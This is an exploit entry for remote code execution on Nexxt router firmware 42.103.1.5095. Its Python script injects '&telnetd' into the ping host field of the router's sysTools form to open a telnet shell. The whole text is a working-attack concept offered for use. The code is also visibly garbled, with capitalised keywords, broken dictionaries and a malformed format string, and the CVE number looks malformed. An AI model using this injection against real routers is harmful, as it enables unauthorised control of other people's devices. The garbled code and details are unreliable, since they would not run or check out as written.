# Exploit Title: Nexxt router Firmware 42.103.1.5095 Remote Code Execution(RCE)
# Date: 19/10/2022
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://www.nexxtsolutions.com/
# Version: 42.103.1.5095
# Tested with: ARN02304U8
# CVE: CVE-2022-444149
Import requests
Base64 import
router_host = “http://192.168.1.1”
username = admin
Password = “admin”.
def main()
send_payload(“&telnetd”)
print(“connect to router using: `telnet “+router_host.split(“//”)[1]+ “` using known credentials”)
Pass
def gen_header(u, p):
return base64.b64encode(f”u:p”.encode(“ascii”)).decode(“ascii”)
def send_payload(payload):
url = router_host+”/goform/sysTools”
headers = “Authorization”: “Basic “.format(gen_header(username, password))
params = “tool”:”,0″, “pingCount:”4”, host: payload, and “sumbit: OK”
requests.post(url, headers=headers, data=params)
If __name__ is not ‘__main__,’
main()
